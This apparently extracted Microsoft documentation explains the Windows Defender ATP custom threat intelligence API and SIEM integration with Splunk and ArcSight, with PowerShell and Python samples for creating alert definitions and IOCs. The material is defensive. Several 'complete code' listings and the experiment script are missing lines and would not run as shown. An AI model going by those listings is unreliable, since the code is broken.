NOTE
The <ClientId> , <ClientSecret> , and the <AuthorizationServerUrl> are all provided to you when enabling the
custom threat intelligence application. For more information, see Enable the custom threat intelligence application.
POST <AuthorizationServerUrl> HTTP/1.1

Content-Type: application/x-www-form-urlencoded
grant_type=client_credentials
&client_id=<ClientId>
&client_secret=<ClientSecret>
&resource=https://graph.microsoft.com
The response will include an access token and expiry information.
{
"token_type": "Bearer",
"expires_in": "3599",
"ext_expires_in": "0",
"expires_on": "1449685363",
"not_before": "1449681463",
"resource": "https://graph.microsoft.com",
"access_token": "<token>"
}
Threat intelligence API metadata

The metadata document ($metadata) is published at the service root.
For example, you can view the service document for the v1.0 version using the following URL:
https://TI.SecurityCenter.Windows.com/v1.0/$metadata
The metadata allows you to see and understand the data model of the custom threat intelligence, including the
entity types and sets, complex types, and enums that make up the request and response packets sent to and from
the threat intelligence API.
You can use the metadata to understand the relationships between entities in the custom threat intelligence and
establish URLs that navigate between entities.
The following sections show a few basic programming pattern calls to the threat intelligence API.
Create new resource

Typically, you'd need to create an alert definition to start creating custom threat intelligence. An ID is created for
that alert definition. You can then proceed to create an indicator of compromise and associate it to the ID of the
alert definition.
Create a new alert definition
POST https://TI.SecurityCenter.Windows.com/v1.0/AlertDefinitions HTTP/1.1

Authorization: Bearer <access_token>
Content-Type: application/json;
{
"Name": " The name of the alert definition. Does not appear in the portal. Max length: 100 ",
"Severity": "Low",
"InternalDescription": "Internal description for the alert definition. Does not appear in the portal. Max
length: 350",
"Title": "A short, one sentence, description of the alert definition. Max length: 120",
"UxDescription": "Max length: 500",
"RecommendedAction": "Custom text to explain what should be done in case of detection. Max length: 2000",
"Category": "Category from the metadata",
"Enabled": true
}
The following values correspond to the alert sections surfaced on Windows Defender Security Center:
HIGHLIGHTED SECTION JSON KEY NAME
1 Title
2 Severity
3 Category
4 UX description
5 Recommended Action
If successful, you should get a 201 CREATED response containing the representation of the newly created alert
definition, for example:
"Name": "Connection to restricted company IP address",
"Severity": "Low",
"InternalDescription": "Unusual connection to restricted IP from production machine",
"Title": "Connection to restricted company IP address",
"UxDescription": "Any connection to this IP address from a production machine should be suspicious. Only
special build machines should access this IP address.",
"RecommendedAction": "Isolate machine immediately and contact machine owner for awareness.",
"Category": "Trojan",
"Id": 2,
"CreatedAt": "2017-02-01T10:46:22.08Z",
"CreatedBy": "User1",
"LastModifiedAt": null,
"LastModifiedBy": null,
"Enabled": true
Create a new indicator of compromise
POST https://TI.SecurityCenter.Windows.com/v1.0/IndicatorsOfCompromise HTTP/1.1

{
"Type": "SHA1",
"Value": "8311e8b377736fb93b18b15372355f3f26c4cd29",
"DetectionFunction": "Equals",
"Enabled": true,
"AlertDefinition@odata.bind": "AlertDefinitions(1)"
}
If successful, you should get a 201 CREATED response containing the representation of the newly created
indicators of compromise in the payload.
The API currently supports the following IOC types:
Sha1
Sha256
Md5
IpAddress
DomainName
And the following operators:
Equals
StartWith
EndWith
Contains
Bulk upload of alert definitions and IOCs

Bulk upload of multiple entities can be done by sending an HTTP POST request to
/{resource}/Actions.BulkUpload .
WARNING
This operation is atomic. The entire operation can either succeed or fail. If one alert definition or IOC has a malformed
property, the entire upload will fail.
If your upload exceeds the IOCs or alert definitions quota, the entire operation will fail. Consider limiting your uploads.
The request’s body should contain a single JSON object with a single field. The name of the field in the case that
the entity is alert definition is alertDefinitions and in the case of IOC is iocs . This field’s value should contain a
list of the desired entities.
For example: Sending an HTTP POST to
https://TI.SecurityCenter.Windows.com/V1.0/IndicatorsOfCompromise/Actions.BulkUpload
JSON Body:
{
"iocs": [{
"Type": "SHA1",
"Value": "b68e0b50420dbb03cb8e56a927105bf4b06f3793",
"Enabled": true,
},
{
"Type": "SHA1",
"Value": "b68e0b50420dbb03cb8e56a927105bf4b06f3793",
"Enabled": true,
}
]
}
NOTE
Max bulk size is 5000 entities
Read existing data

Get a specific resource
GET https://TI.SecurityCenter.Windows.com/v1.0/IndicatorsOfCompromise(1) HTTP/1.1

Accept: application/json;odata.metadata=none
If successful, you should get a 200 OK response containing a single indicator of compromise representation (for
the specified ID ) in the payload, as shown as follows:
HTTP/1.1 200 OK
content - type: application/json;odata.metadata = none
{
"value": [{
"Type": "SHA1",
"Value": "abcdeabcde1212121212abcdeabcde1212121212",
"ExpiresAt": null,
"Id": 1,
"CreatedAt": "2016-12-05T15:51:02Z",
"CreatedBy": "user2@Company1.contoso.com",
"Enabled": true
}]
}
Get the entire collection of entities of a given resource
GET https://TI.SecurityCenter.Windows.com/v1.0/AlertDefinitions HTTP/1.1

If successful, you should get a 200 OK response containing the collection of alert definitions representation in the
payload, as shown as follows:
HTTP/1.1 200 OK
content - type: application / json;odata.metadata = none
{
"@odata.context": "https://TI.SecurityCenter.Windows.com/V1.0/$metadata#AlertDefinitions",
"value": [{
"Name": "Demo alert definition",
"Severity": "Medium",
"InternalDescription": "Some description",
"Title": "Demo short ux description",
"UxDescription": "Demo ux description",
"RecommendedAction": "Actions",
"Category": "Malware",
"Id": 1,
"CreatedAt": "2016-12-05T15:50:53Z",
"CreatedBy": "user@Company1.contoso.com",
"Enabled": true
},
{
"Name": "Demo alert definition 2",
"Severity": "Low",
"InternalDescription": "Some description",
"Title": "Demo short ux description2",
"UxDescription": "Demo ux description2",
"RecommendedAction": null,
"Category": "Malware",
"Id": 2,
"CreatedAt": "2016-12-06T13:30:00Z",
"CreatedBy": "user2@Company1.contoso.com",
"Enabled": true
}
]
}
Update an existing resource

You can use the same pattern for both full and partial updates.
PATCH https://TI.SecurityCenter.Windows.com/v1.0/AlertDefinitions(2) HTTP/1.1

Accept: application/json;odata.metadata=none
{
"Category": "Backdoor",
"Enabled": false
}
If successful, you should get a 200 OK response containing the updated alert definition representation (per the
specified ID ) in the payload.
Update the association (relation) between an indicator of compromise

to a different alert definition
PUT https://TI.SecurityCenter.Windows.com/v1.0/IndicatorsOfCompromise(3)/AlertDefinition/$ref HTTP/1.1
Authorization : Bearer <access_token>
{
"@odata.id": "https://TI.SecurityCenter.Windows.com/v1.0/AlertDefinitions(6)"
}
Delete a resource
DELETE https://TI.SecurityCenter.Windows.com/v1.0/IndicatorsOfCompromise(1) HTTP/1.1
If successful, you should get a 204 NO CONTENT response.
NOTE
Deleting an alert definition also deletes its corresponding IOCs.
Deleting an IOC or an alert definition will not delete or hide past alerts matching the alert definition. However, deleting
an alert definition and creating a new one with the exact same metadata will result in new alerts in the portal. It's not
advised to delete an alert definition and create a new one with the same content.
Delete all
You can use the HTTP DELETE method sent to the relevant source to delete all resources.
DELETE https://TI.SecurityCenter.Windows.com/v1.0/IndicatorsOfCompromise HTTP/1.1

Authorization : Bearer <access_token>
If successful, you should get a 204 NO CONTENT response.
Delete all IOCs connected to a given alert definition

This action will delete all the IOCs associated with a given alert definition without deleting the alert definition
itself.
For example, deleting all of the IOCs associated with the alert definition with ID 1 deletes all those IOCs without
deleting the alert definition itself.
Send an HTTP POST to https://TI.SecurityCenter.Windows.com/V1.0/AlertDefinitions(1)/Actions.DeleteIOCs .
Upon a successful request the response will be HTTP 204.
NOTE
As with all OData actions, this action is sending an HTTP POST request not DELETE.
Windows Defender ATP optional query parameters

The Windows Defender ATP threat intelligence API provides several optional query parameters that you can use
to specify and control the amount of data returned in a response. The threat intelligence API supports the
following query options:
NAME VALUE DESCRIPTION
$select string Comma-separated list of properties to

include in the response.
$expand string Comma-separated list of relationships

to expand and include in the response.
$orderby string Comma-separated list of properties

that are used to sort the order of items
in the response collection.
$filter string Filters the response based on a set of

criteria.
$top int The number of items to return in a

result set.
$skip int The number of items to skip in a result

set.
$count boolean A collection and the number of items in

the collection.
These parameters are compatible with the OData V4 query language.
Code examples
The following articles provide detailed code examples that demonstrate how to use the custom threat intelligence
API in several programming languages:
PowerShell code examples
Python code examples
Related topics
PowerShell code examples for the custom threat
intelligence API
Applies to:
This article provides PowerShell code examples for using the custom threat intelligence API.
These code examples demonstrate the following tasks:
Obtain an Azure AD access token
Create headers
Create calls to the custom threat intelligence API
Step 1: Obtain an Azure AD access token

The following example demonstrates how to obtain an Azure AD access token that you can use to call methods in
the custom threat intelligence API. After you obtain a token, you have 60 minutes to use this token in calls to the
custom threat intelligence API before the token expires. After the token expires, you can generate a new token.
Replace the authUrl, clientid, and clientSecret values with the ones you got from Settings page in the portal:
$authUrl = 'Your Authorization URL'

$clientId = 'Your Client ID'
$clientSecret = 'Your Client Secret'
$tokenPayload = @{
"resource"='https://graph.windows.net'
"client_id" = $clientId
"client_secret" = $clientSecret
"grant_type"='client_credentials'}
$response = Invoke-RestMethod $authUrl -Method Post -Body $tokenPayload

$token = $response.access_token
Step 2: Create headers used for the requests with the API
Use the following code to create the headers used for the requests with the API:
$headers = @{
"Content-Type"="application/json"
"Accept"="application/json"
"Authorization"="Bearer {0}" -f $token }
$apiBaseUrl = "https://ti.securitycenter.windows.com/V1.0/"
Step 3: Create calls to the custom threat intelligence API

After creating the headers, you can now create calls to the API. The following example demonstrates how you can
view all the alert definition entities:
$alertDefinitions =
(Invoke-RestMethod ("{0}AlertDefinitions" -f $apiBaseUrl) -Method Get -Headers $headers).value
The response is empty on initial use of the API.
Step 4: Create a new alert definition

The following example demonstrates how you to create a new alert definition.
$alertDefinitionPayload = @{
"Name"= "The alert's name"
"Severity"= "Low"
"InternalDescription"= "An internal description of the Alert"
"Title"= "The Title"
"UxDescription"= "Description of the alerts"
"RecommendedAction"= "The alert's recommended action"
"Category"= "Trojan"
"Enabled"= "true"}
$alertDefinition =
Invoke-RestMethod ("{0}AlertDefinitions" -f $apiBaseUrl) `
-Method Post -Headers $headers -Body ($alertDefinitionPayload | ConvertTo-Json)
Step 5: Create a new indicator of compromise

You can now use the alert ID obtained from creating a new alert definition to create a new indicator of
compromise.
$iocPayload = @{
"Type"="Sha1"
"Value"="dead1111eeaabbccddeeaabbccddee11ffffffff"
"DetectionFunction"="Equals"
"Enabled"="true"
"AlertDefinition@odata.bind"="AlertDefinitions({0})" -f $alertDefinitionId }
$ioc =
Invoke-RestMethod ("{0}IndicatorsOfCompromise" -f $apiBaseUrl) `
-Method Post -Headers $headers -Body ($iocPayload | ConvertTo-Json)
Complete code
You can use the complete code to create calls to the API.
$tokenPayload = @{
"resource"='https://graph.windows.net'

$headers = @{
"Content-Type"="application/json"
"Accept"="application/json"
"Authorization"="Bearer {0}" -f $token }
$alertDefinitions =
(Invoke-RestMethod ("{0}AlertDefinitions" -f $apiBaseUrl) -Method Get -Headers $headers).value
"Name"= "The alert's name"
"Severity"= "Low"
"InternalDescription"= "An internal description of the Alert"
"Title"= "The Title"
"UxDescription"= "Description of the alerts"
"RecommendedAction"= "The alert's recommended action"
"Category"= "Trojan"
"Enabled"= "true"}
$alertDefinition =
$alertDefinitionId = $alertDefinition.Id
$iocPayload = @{
"Type"="Sha1"
"Value"="dead1111eeaabbccddeeaabbccddee11ffffffff"
"Enabled"="true"
$ioc =
Related topics
Python code examples for the custom threat
intelligence API
Applies to:
Before you begin

You must install the "requests" python library.
These code examples demonstrate the following tasks:
Obtain an Azure AD access token
Create request session object
Create calls to the custom threat intelligence API
Step 1: Obtain an Azure AD access token

The following example demonstrates how to obtain an Azure AD access token that you can use to call methods
in the custom threat intelligence API. After you obtain a token, you have 60 minutes to use this token in calls to
the custom threat intelligence API before the token expires. After the token expires, you can generate a new
token.
Replace the auth_url, client_id, and client_secret values with the ones you got from Settings page in the portal:
import json
import requests
from pprint import pprint
auth_url="Your Authorization URL"

client_id="Your Client ID"
client_secret="Your Client Secret"
payload = {"resource": "https://graph.windows.net",

"client_id": client_id,
"client_secret": client_secret,
"grant_type": "client_credentials"}
response = requests.post(auth_url, payload)

token = json.loads(response.text)["access_token"]
Step 2: Create request session object

Add HTTP headers to the session object, including the Authorization header with the token that was obtained.
with requests.Session() as session:
session.headers = {
'Authorization': 'Bearer {}'.format(token),
'Content-Type': 'application/json',
'Accept': 'application/json'}
Step 3: Create calls to the custom threat intelligence API

After adding HTTP headers to the session object, you can now create calls to the API. The following example
demonstrates how you can view all the alert definition entities:
response = session.get("https://ti.securitycenter.windows.com/V1.0/AlertDefinitions")
pprint(json.loads(response.text))
The response is empty on initial use of the API.
Step 4: Create a new alert definition

The following example demonstrates how you to create a new alert definition.
alert_definition = {"Name": "The alert's name",

"Severity": "Low",
"InternalDescription": "An internal description of the alert",
"Title": "The Title",
"UxDescription": "Description of the alerts",
"RecommendedAction": "The alert's recommended action",
"Enabled": True}
response = session.post(
"https://ti.securitycenter.windows.com/V1.0/AlertDefinitions",
json=alert_definition)
Step 5: Create a new indicator of compromise

You can now use the alert ID obtained from creating a new alert definition to create a new indicator of
compromise.
alert_definition_id = json.loads(response.text)["Id"]
ioc = {'Type': "Sha1",

'Value': "dead1111eeaabbccddeeaabbccddee11ffffffff",
'DetectionFunction': "Equals",
'Enabled': True,
"AlertDefinition@odata.bind": "AlertDefinitions({0})".format(alert_definition_id)}
"https://ti.securitycenter.windows.com/V1.0/IndicatorsOfCompromise",
json=ioc)
Complete code
You can use the complete code to create calls to the API.
import json
import requests
from pprint import pprint
auth_url="Your Authorization URL"

client_id="Your Client ID"
client_secret="Your Client Secret"
payload = {"resource": "https://graph.windows.net",

"client_id": client_id,
"client_secret": client_secret,
"grant_type": "client_credentials"}
response = requests.post(auth_url, payload)

token = json.loads(response.text)["access_token"]
with requests.Session() as session:

session.headers = {
'Authorization': 'Bearer {}'.format(token),
'Content-Type': 'application/json',
'Accept': 'application/json'}
response = session.get("https://ti.securitycenter.windows.com/V1.0/AlertDefinitions")
alert_definition = {"Name": "The alert's name",

"Severity": "Low",
"InternalDescription": "An internal description of the alert",
"Title": "The Title",
"UxDescription": "Description of the alerts",
"RecommendedAction": "The alert's recommended action",
"Enabled": True}
"https://ti.securitycenter.windows.com/V1.0/AlertDefinitions",
json=alert_definition)
alert_definition_id = json.loads(response.text)["Id"]
ioc = {'Type': "Sha1",

'Value': "dead1111eeaabbccddeeaabbccddee11ffffffff",
'DetectionFunction': "Equals",
'Enabled': True,
"AlertDefinition@odata.bind": "AlertDefinitions({0})".format(alert_definition_id)}
"https://ti.securitycenter.windows.com/V1.0/IndicatorsOfCompromise",
json=ioc)
Related topics
Experiment with custom threat intelligence (TI) alerts
Applies to:
With the Windows Defender ATP threat intelligence API, you can create custom threat intelligence alerts that can
help you keep track of possible attack activities in your organization.
For more information about threat intelligence concepts, see Understand threat intelligence concepts.
This article demonstrates an end-to-end usage of the threat intelligence API to get you started in using the threat
intelligence API.
You'll be guided through sample steps so you can experience how the threat intelligence API feature works.
Sample steps include creating alerts definitions and indicators of compromise (IOCs), and examples of how
triggered custom TI alerts look like.
Step 1: Enable the threat intelligence API and obtain authentication

details
To use the threat intelligence API feature, you'll need to enable the feature. For more information, see Enable the
custom threat intelligence application.
This step is required to generate security credentials that you need to use while working with the API.
Step 2: Create a sample alert definition and IOCs

This step will guide you in creating an alert definition and an IOC for a malicious IP.
1. Open a Windows PowerShell ISE.
2. Copy and paste the following PowerShell script. This script will upload a sample alert definition and IOC
to Windows Defender ATP which you can use to generate an alert.
NOTE: Make sure you replace the authUrl, clientId, and clientSecret values with your details which you
saved in when you enabled the threat intelligence application.
Try
{
$tokenPayload = @{
"resource" = 'https://graph.windows.net'
"Fetching an access token"

"Token fetched successfully"
$headers = @{
"Content-Type" = "application/json"
"Accept" = "application/json"
"Authorization" = "Bearer {0}" -f $token }
"Name" = "Test Alert"
"Severity" = "Medium"
"InternalDescription" = "A test alert used to demonstrate the Windows Defender ATP TI API
feature"
"Title" = "Test alert."
"UxDescription" = "This is a test alert based on a sample custom alert definition. This
alert was triggered manually using a provided test command. It indicates that the Threat Intelligence
API has been properly enabled."
"RecommendedAction" = "No recommended action for this test alert."
"Category" = "SuspiciousNetworkTraffic"
"Enabled" = "true"}
"Creating an Alert Definition"

$alertDefinition =
"Alert Definition created successfully"

$alertDefinitionId = $alertDefinition.Id
$iocPayload = @{
"Type"="IpAddress"
"Value"="52.184.197.12"
"Enabled"="true"
"Creating an Indicator of Compromise"

$ioc =
"Indicator of Compromise created successfully"
"All done!"
}
Catch
{
"Something went wrong! Got the following exception message: {0}" -f $_.Exception.Message
}
3. Run the script and verify that the operation succeeded in the results the window. Wait up to 20 minutes
until the new or updated alert definition propagates to the detection engines.
NOTE:
If you get the exception “The remote server returned an error: (407) Proxy Authentication Required", you
need to add the proxy configuration by adding the following code to the PowerShell script:
$webclient=New-Object System.Net.WebClient
$creds=Get-Credential
$webclient.Proxy.Credentials=$creds
Step 3: Simulate a custom TI alert

This step will guide you in simulating an event in connection to a malicious IP that will trigger the Windows
Defender ATP custom TI alert.
1. Open a Windows PowerShell ISE in the machine you onboarded to Windows Defender ATP.
2. Type Invoke-WebRequest 52.184.197.12 in the editor and click Run. This call will generate a network
communication event to a Microsoft's dedicated demo server that will raise an alert based on the custom
alert definition.
Step 4: Explore the custom alert in the portal

This step will guide you in exploring the custom alert in the portal.
1. Open Windows Defender Security Center on a browser.
2. Log in with your Windows Defender ATP credentials.
3. The dashboard should display the custom TI alert for the victim machine resulting from the simulated
attack.
NOTE
There is a latency time of approximately 20 minutes between the time a custom TI is introduced and when it becomes
effective.
Related topics
Applies to:
You might need to troubleshoot issues while using the custom threat intelligence feature.
This page provides detailed steps to troubleshoot issues you might encounter while using the feature.
Learn how to get a new client secret

If your client secret expires or if you've misplaced the copy provided when you were enabling the custom threat
intelligence application, you'll need to get a new secret.
1. Login to the Azure management portal.
2. Select Active Directory.
3. Select your tenant.
4. Click App registrations > All apps. Then select the relevant application name:
WindowsDefenderATPThreatIntelAPI (formerly known as
WindowsDefenderATPCustomerTiConnector)
WindowsDefenderATPSiemConnector
5. Under Settings, select Keys, then provide a key description and specify the key validity duration.
6. Click Save. The key value is displayed.
7. Copy the value and save it in a safe place.
Related topics
Applies to:
Pull alerts using security information and events management (SIEM)

tools
Windows Defender ATP supports (SIEM ) tools to pull alerts. Windows Defender ATP exposes alerts through an
HTTPS endpoint hosted in Azure. The endpoint can be configured to pull alerts from your enterprise tenant in
Azure Active Directory (AAD ) using the OAuth 2.0 authentication protocol for an AAD application that represents
the specific SIEM connector installed in your environment.
Windows Defender ATP currently supports the following SIEM tools:
Splunk
HP ArcSight
To use either of these supported SIEM tools you'll need to:
Enable SIEM integration in Windows Defender ATP
Configure the supported SIEM tool:
Configure Splunk to pull Windows Defender ATP alerts
Configure HP ArcSight to pull Windows Defender ATP alerts
For more information on the list of fields exposed in the alerts API see, Windows Defender ATP alert API fields.
Pull Windows Defender ATP alerts using REST API

Windows Defender ATP supports the OAuth 2.0 protocol to pull alerts using REST API.
For more information, see Pull Windows Defender ATP alerts using REST API.
In this section
TOPIC DESCRIPTION
Enable SIEM integration in Windows Defender ATP Learn about enabling the SIEM integration feature in the
Settings page in the portal so that you can use and generate
the required information to configure supported SIEM tools.
Configure Splunk to pull Windows Defender ATP alerts Learn about installing the REST API Modular Input app and
other configuration settings to enable Splunk to pull Windows
Defender ATP alerts.
Configure HP ArcSight to pull Windows Defender ATP alerts Learn about installing the HP ArcSight REST FlexConnector
package and the files you need to configure ArcSight to pull
Windows Defender ATP alerts.
TOPIC DESCRIPTION
Windows Defender ATP alert API fields Understand what data fields are exposed as part of the alerts
API and how they map to Windows Defender Security Center.
Pull Windows Defender ATP alerts using REST API Use the Client credentials OAuth 2.0 flow to pull alerts from
Windows Defender ATP using REST API.
Troubleshoot SIEM tool integration issues Address issues you might encounter when using the SIEM
integration feature.
Applies to:
Enable security information and event management (SIEM ) integration so you can pull alerts from Windows
Defender Security Center using your SIEM solution or by connecting directly to the alerts REST API.
Prerequisites
The user who activates the setting must have permissions to create an app in Azure Active Directory (AAD ). This
is typically someone with a Global administrator role.
During the initial activation, a pop-up screen is displayed for credentials to be entered. Make sure that you allow
pop-ups for this site.
Enabling SIEM integration

1. In the navigation pane, select Settings > SIEM.
TIP
If you encounter an error when trying to enable the SIEM connector application, check the pop-up blocker settings of
your browser. It might be blocking the new window being opened when you enable the capability.
2. Select Enable SIEM integration. This activates the SIEM connector access details section with pre-
populated values and an application is created under you Azure Active Directory (AAD ) tenant.
WARNING
3. Choose the SIEM type you use in your organization.
NOTE
If you select HP ArcSight, you'll need to save these two configuration files:
WDATP-connector.jsonparser.properties
WDATP-connector.properties
If you want to connect directly to the alerts REST API through programmatic access, choose Generic API.
NOTE
You'll need to generate a new Refresh token every 90 days.
You can now proceed with configuring your SIEM solution or connecting to the alerts REST API through
programmatic access. You'll need to use the tokens when configuring your SIEM solution to allow it to receive
alerts from Windows Defender Security Center.
Integrate Windows Defender ATP with IBM QRadar
You can configure IBM QRadar to collect alerts from Windows Defender ATP. For more information, see IBM
Knowledge Center.
Related topics
Windows Defender ATP alert API fields
Configure Splunk to pull Windows Defender ATP
alerts
Applies to:
You'll need to configure Splunk so that it can pull Windows Defender ATP alerts.
Before you begin

Install the REST API Modular Input app in Splunk.
Make sure you have enabled the SIEM integration feature from the Settings menu. For more
information, see Enable SIEM integration in Windows Defender ATP
Have the details file you saved from enabling the SIEM integration feature ready. You'll need to get the
following values:
OAuth 2 Token refresh URL
OAuth 2 Client ID
OAuth 2 Client secret
Have the refresh token that you generated from the SIEM integration feature ready.
Configure Splunk
1. Login in to Splunk.
2. Click Search & Reporting, then Settings > Data inputs.
3. Click REST under Local inputs.
NOTE: This input will only appear after you install the REST API Modular Input app.
4. Click New.
5. Type the following values in the required fields, then click Save:
NOTE: All other values in the form are optional and can be left blank.
FIELD VALUE
Endpoint URL Depending on the location of your datacenter, select any
of the following URL:
For EU:
https://wdatp-alertexporter-
eu.securitycenter.windows.com/api/alerts
For US:
us.securitycenter.windows.com/api/alerts
For UK:
uk.securitycenter.windows.com/api/alerts
HTTP Method GET
Authentication Type oauth2
OAuth 2 Access token Use the value that you generated when you enabled the
SIEM integration feature.
NOTE: The access token expires after an hour.
OAuth 2 Refresh Token Use the value that you generated when you enabled the
SIEM integration feature.
OAuth 2 Token Refresh URL Use the value from the details file you saved when you
enabled the SIEM integration feature.
OAuth 2 Client ID Use the value from the details file you saved when you
OAuth 2 Client Secret Use the value from the details file you saved when you
Response type Json
Response Handler JSONArrayHandler
Polling Interval Number of seconds that Splunk will ping the Windows
Defender ATP machine. Accepted values are in seconds.
Set sourcetype Manual
Source type _json
After completing these configuration steps, you can go to the Splunk dashboard and run queries.
View alerts using Splunk solution explorer

Use the solution explorer to view alerts in Splunk.
1. In Splunk, go to Settings > Searchers, reports, and alerts.
2. Select New.
3. Enter the following details:
Destination app: Select Search & Reporting (search)
Search name: Enter a name for the query
Search: Enter a query, for example:
source="rest://windows atp alerts"|spath|table*
Other values are optional and can be left with the default values.
4. Click Save. The query is saved in the list of searches.
5. Find the query you saved in the list and click Run. The results are displayed based on your query.
TIP
To mininimize alert duplications, you can use the following query:
source="rest://windows atp alerts" | spath | dedup _raw | table *
Related topics
Configure ArcSight to pull Windows Defender ATP alerts
Configure HP ArcSight to pull Windows Defender
ATP alerts
Applies to:
You'll need to install and configure some files and tools to use HP ArcSight so that it can pull Windows Defender
ATP alerts.
Before you begin

Configuring the HP ArcSight Connector tool requires several configuration files for it to pull and parse alerts
from your Azure Active Directory (AAD ) application.
This section guides you in getting the necessary information to set and use the required configuration files
correctly.
Make sure you have enabled the SIEM integration feature from the Settings menu. For more information,
see Enable SIEM integration in Windows Defender ATP.
Have the file you saved from enabling the SIEM integration feature ready. You'll need to get the following
values:
OAuth 2.0 Token refresh URL
OAuth 2.0 Client ID
OAuth 2.0 Client secret
Have the following configuration files ready:
WDATP -connector.properties
WDATP -connector.jsonparser.properties
You would have saved a .zip file which contains these two files when you chose HP ArcSight as the
SIEM type you use in your organization.
Make sure you generate the following tokens and have them ready:
Access token
Refresh token
You can generate these tokens from the SIEM integration setup section of the portal.
Install and configure HP ArcSight FlexConnector

The following steps assume that you have completed all the required steps in Before you begin.
1. Install the latest 32-bit Windows FlexConnector installer. You can find this in the HPE Software center. The
tool is typically installed in the following default location:
C:\Program Files\ArcSightFlexConnectors\current\bin .
You can choose where to save the tool, for example C:\folder_location\current\bin where folder_location
represents the installation location.
2. Follow the installation wizard through the following tasks:
Introduction
Choose Install Folder
Choose Install Set
Choose Shortcut Folder
Pre-Installation Summary
Installing...
You can keep the default values for each of these tasks or modify the selection to suit your requirements.
3. Open File Explorer and locate the two configuration files you saved when you enabled the SIEM
integration feature. Put the two files in the FlexConnector installation location, for example:
WDATP -connector.jsonparser.properties: C:\folder_location\current\user\agent\flexagent\
WDATP -connector.properties: C:\folder_location\current\user\agent\flexagent\
NOTE: You must put the configuration files in this location, where folder_location represents the location
where you installed the tool.
4. After the installation of the core connector completes, the Connector Setup window opens. In the
Connector Setup window, select Add a Connector.
5. Select Type: ArcSight FlexConnector REST and click Next.
6. Type the following information in the parameter details form. All other values in the form are optional and
can be left blank.
FIELD VALUE
Configuration File Type in the name of the client property file. The name
must match the file provided in the .zip that you
downloaded. For example, if the configuration file in
"flexagent" directory is named "WDATP-
Connector.jsonparser.properties", you must type
"WDATP-Connector" as the name of the client property
file.
Events URL Depending on the location of your datacenter, select

either the EU or the US URL:
For EU: https://wdatp-alertexporter-
eu.windows.com/api/alerts/?
sinceTimeUtc=$START_AT_TIME
For US: https://wdatp-alertexporter-

us.windows.com/api/alerts/?
For UK: https://wdatp-alertexporter-

uk.windows.com/api/alerts/?
Authentication Type OAuth 2

OAuth 2 Client Properties file Browse to the location of the wdatp-connector.properties
file. The name must match the file provided in the .zip
that you downloaded.
Refresh Token You can obtain a refresh token in two ways: by

generating a refresh token from the SIEM settings page
or using the restutil tool.
For more information on generating a refresh token from

the Preferences setup , see Enable SIEM integration in
Get your refresh token using the restutil tool:

a. Open a command prompt. Navigate to
C:\folder_location\current\bin where folder_location
represents the location where you installed the tool.
b. Type: arcsight restutil token -config from the

bin directory.For example: arcsight restutil boxtoken -
proxy proxy.location.hp.com:8080 A Web browser
window will open.
c. Type in your credentials then click on the password field

to let the page redirect. In the login prompt, enter your
credentials.
d. A refresh token is shown in the command prompt.
e. Copy and paste it into the Refresh Token field.
7. A browser window is opened by the connector. Login with your application credentials. After you log in,
you'll be asked to give permission to your OAuth2 Client. You must give permission to your OAuth 2
Client so that the connector configuration can authenticate.
If the redirect_uri is a https URL, you'll be redirected to a URL on the local host. You'll see a page that
requests for you to trust the certificate supplied by the connector running on the local host. You'll need to
trust this certificate if the redirect_uri is a https.
If however you specify a http URL for the redirect_uri, you do not need to provide consent in trusting the
certificate.
8. Continue with the connector setup by returning to the HP ArcSight Connector Setup window.
9. Select the ArcSight Manager (encrypted) as the destination and click Next.
10. Type in the destination IP/hostname in Manager Hostname and your credentials in the parameters form.
All other values in the form should be retained with the default values. Click Next.
11. Type in a name for the connector in the connector details form. All other values in the form are optional
and can be left blank. Click Next.
12. The ESM Manager import certificate window is shown. Select Import the certificate to connector from
destination and click Next. The Add connector Summary window is displayed and the certificate is
imported.
13. Verify that the details in the Add connector Summary window is correct, then click Next.
14. Select Install as a service and click Next.
15. Type a name in the Service Internal Name field. All other values in the form can be retained with the
default values or left blank . Click Next.
16. Type in the service parameters and click Next. A window with the Install Service Summary is shown.
Click Next.
17. Finish the installation by selecting Exit and Next.
Install and configure the HP ArcSight console

1. Follow the installation wizard through the following tasks:
Introduction
License Agreement
Special Notice
Choose ArcSight installation directory
Choose Shortcut Folder
Pre-Installation Summary
2. Click Install. After the installation completes, the ArcSight Console Configuration Wizard opens.
3. Type localhost in Manager Host Name and 8443 in Manager Port then click Next.
4. Select Use direct connection, then click Next.
5. Select Password Based Authentication, then click Next.
6. Select This is a single user installation. (Recommended), then click Next.
7. Click Done to quit the installer.
8. Login to the HP ArcSight console.
9. Navigate to Active channel set > New Condition > Device > Device Product.
10. Set Device Product = Windows Defender ATP. When you've verified that events are flowing to the
tool, stop the process again and go to Windows Services and start the ArcSight FlexConnector REST.
You can now run queries in the HP ArcSight console.
Windows Defender ATP alerts will appear as discrete events, with "Microsoft” as the vendor and “Windows
Defender ATP” as the device name.
Troubleshooting HP ArcSight connection

Problem: Failed to refresh the token. You can find the log located in C:\folder_location\current\logs where
folder_location represents the location where you installed the tool. Open agent.log and look for
ERROR/FATAL/WARN .
Symptom: You get the following error message:

Failed to refresh the token. Set reauthenticate to true: com.arcsight.common.al.e: Failed to refresh access
token: status=HTTP/1.1 400 Bad Request FATAL EXCEPTION: Could not refresh the access token
Solution:
1. Stop the process by clicking Ctrl + C on the Connector window. Click Y when asked "Terminate batch job
Y/N?".
2. Navigate to the folder where you stored the WDATP -connector.properties file and edit it to add the
following value: reauthenticate=true .
3. Restart the connector by running the following command: arcsight.bat connectors .
A browser window appears. Allow it to run, it should disappear, and the connector should now be running.
NOTE
Verify that the connector is running by stopping the process again. Then start the connector again, and no browser window
should appear.
Related topics
Windows Defender ATP SIEM alert API fields
Applies to:
Understand what data fields are exposed as part of the alerts API and how they map to Windows Defender Security Center.
Alert API fields and portal mapping

The following table lists the available fields exposed in the alerts API payload. It shows examples for the populated values and a
reference on how data is reflected on the portal.
The ArcSight field column contains the default mapping between the Windows Defender ATP fields and the built-in fields in
ArcSight. You can download the mapping file from the portal when you enable the SIEM integration feature and you can modify it to
match the needs of your organization. For more information, see Enable SIEM integration in Windows Defender ATP.
Field numbers match the numbers in the images below.
PORTAL LABEL SIEM FIELD NAME ARCSIGHT FIELD EXAMPLE VALUE DESCRIPTION
1 AlertTitle name A dll was unexpectedly Value available for every

loaded into a high alert.
integrity process without
a UAC prompt
2 Severity deviceSeverity Medium Value available for every

alert.
3 Category deviceEventCategory Privilege Escalation Value available for every

alert.
4 Source sourceServiceName WindowsDefenderATP Windows Defender

Antivirus or Windows
Defender ATP. Value
available for every alert.
5 MachineName sourceHostName liz-bean Value available for every

alert.
